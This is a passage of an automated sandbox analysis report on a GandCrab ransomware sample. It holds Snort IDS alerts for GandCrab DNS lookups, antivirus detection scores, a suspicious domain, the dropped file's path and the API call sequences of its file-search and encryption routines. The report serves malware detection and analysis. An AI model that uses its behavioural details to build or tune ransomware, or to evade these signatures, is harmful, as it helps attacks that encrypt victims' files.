                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850232532026737 09/01/22-00:00:07.481526
                        SID:2026737
                        Source Port:50232
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865387532829498 08/31/22-23:59:40.854236
                        SID:2829498
                        Source Port:65387
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.863451532026737 08/31/22-23:59:36.620733
                        SID:2026737
                        Source Port:63451
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.864125532026737 08/31/22-23:59:50.625202
                        SID:2026737
                        Source Port:64125
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860476532829498 08/31/22-23:59:59.898864
                        SID:2829498
                        Source Port:60476
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854157532026737 08/31/22-23:59:42.301537
                        SID:2026737
                        Source Port:54157
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.857392532829498 09/01/22-00:00:05.176878
                        SID:2829498
                        Source Port:57392
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852460532829498 09/01/22-00:00:11.371195
                        SID:2829498
                        Source Port:52460
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.857389532829498 09/01/22-00:00:05.118977
                        SID:2829498
                        Source Port:57389
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856043532829498 08/31/22-23:58:21.768917
                        SID:2829498
                        Source Port:56043
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853052532829498 08/31/22-23:59:12.328339
                        SID:2829498
                        Source Port:53052
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861419532829498 08/31/22-23:59:01.474961
                        SID:2829498
                        Source Port:61419
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851996532829498 08/31/22-23:59:24.245596
                        SID:2829498
                        Source Port:51996
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853432532829498 08/31/22-23:59:18.305428
                        SID:2829498
                        Source Port:53432
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860585532026737 08/31/22-23:58:15.025136
                        SID:2026737
                        Source Port:60585
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.863450532026737 08/31/22-23:59:36.602428
                        SID:2026737
                        Source Port:63450
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860477532829498 08/31/22-23:59:59.919053
                        SID:2829498
                        Source Port:60477
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856951532026737 08/31/22-23:58:46.526858
                        SID:2026737
                        Source Port:56951
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865112532829498 08/31/22-23:58:33.402809
                        SID:2829498
                        Source Port:65112
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865020532829498 08/31/22-23:58:54.651252
                        SID:2829498
                        Source Port:65020
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.863449532026737 08/31/22-23:59:36.584182
                        SID:2026737
                        Source Port:63449
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865201532026737 08/31/22-23:59:03.503720
                        SID:2026737
                        Source Port:65201
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860830532829498 08/31/22-23:59:53.997132
                        SID:2829498
                        Source Port:60830
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859640532026737 08/31/22-23:58:24.925442
                        SID:2026737
                        Source Port:59640
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.864123532026737 08/31/22-23:59:50.576561
                        SID:2026737
                        Source Port:64123
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850788532829498 08/31/22-23:59:48.220006
                        SID:2829498
                        Source Port:50788
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860092532026737 08/31/22-23:59:14.392903
                        SID:2026737
                        Source Port:60092
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858124532026737 08/31/22-23:59:27.287358
                        SID:2026737
                        Source Port:58124
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865199532026737 08/31/22-23:59:03.462712
                        SID:2026737
                        Source Port:65199
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859639532026737 08/31/22-23:58:24.905091
                        SID:2026737
                        Source Port:59639
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856953532026737 08/31/22-23:58:46.573613
                        SID:2026737
                        Source Port:56953
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858304532829498 08/31/22-23:59:32.344904
                        SID:2829498
                        Source Port:58304
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860752532829498 08/31/22-23:58:43.003278
                        SID:2829498
                        Source Port:60752
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865514532026737 08/31/22-23:59:20.740564
                        SID:2026737
                        Source Port:65514
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860829532829498 08/31/22-23:59:53.975918
                        SID:2829498
                        Source Port:60829
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.862053532829498 08/31/22-23:58:21.721380
                        SID:2829498
                        Source Port:62053
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856621532026737 09/01/22-00:00:02.160962
                        SID:2026737
                        Source Port:56621
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: gI5xZdIxUs.exeVirustotal: Detection: 85%Perma Link
                        Source: gI5xZdIxUs.exeMetadefender: Detection: 74%Perma Link
                        Source: gI5xZdIxUs.exeReversingLabs: Detection: 92%
                        Antivirus / Scanner detection for submitted sample
                        Source: gI5xZdIxUs.exeAvira: detected
                        Multi AV Scanner detection for domain / URL
                        Source: dns1.soprodns.ruVirustotal: Detection: 5%Perma Link
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Machine Learning detection for sample
                        Source: gI5xZdIxUs.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeJoe Sandbox ML: detected
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpackAvira: Label: TR/Dropper.Gen
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC65880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,1_2_0FC65880
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC682A0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC662B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,1_2_0FC662B0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC64950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,1_2_0FC64950
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC68150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC68150
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC65670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,1_2_0FC65670
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC65210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,1_2_0FC65210
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,1_2_0FC66530
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,14_2_0F9D4950
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,14_2_0F9D5880
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,14_2_0F9D62B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,14_2_0F9D82A0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,14_2_0F9D5210
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,14_2_0F9D6530
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,14_2_0F9D8150
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,14_2_0F9D5670
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,20_2_0F9D4950
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,20_2_0F9D5880
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,20_2_0F9D62B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,20_2_0F9D82A0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,20_2_0F9D5210
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,20_2_0F9D6530
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,20_2_0F9D8150
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,20_2_0F9D5670
                        Source: gI5xZdIxUs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: gI5xZdIxUs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: z:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: x:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: v:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: t:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: r:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: p:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: n:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: l:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: j:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: h:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: f:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: b:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: y:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: w:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: u:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: s:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: q:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: o:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: m:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: k:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: i:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: g:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: e:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile opened: a:Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,1_2_0FC66C90
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,1_2_0FC66A40
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,14_2_0F9D6C90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,14_2_0F9D6A40
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,20_2_0F9D6C90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,20_2_0F9D6A40

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52957 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52958 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52959 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52960 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60584 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60585 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60586 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60587 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62052 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62053 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62054 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:56043 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59638 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59639 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59640 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59641 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65109 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65110 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65111 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65112 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58693 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58694 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58695 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58696 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60751 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60752 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60753 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60754 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56951 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56952 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56953 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56954 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65019 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65020 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65021 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65022 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53468 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53469 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53470 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53471 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61418 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61419 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61420 -> 8.8.8.8:53
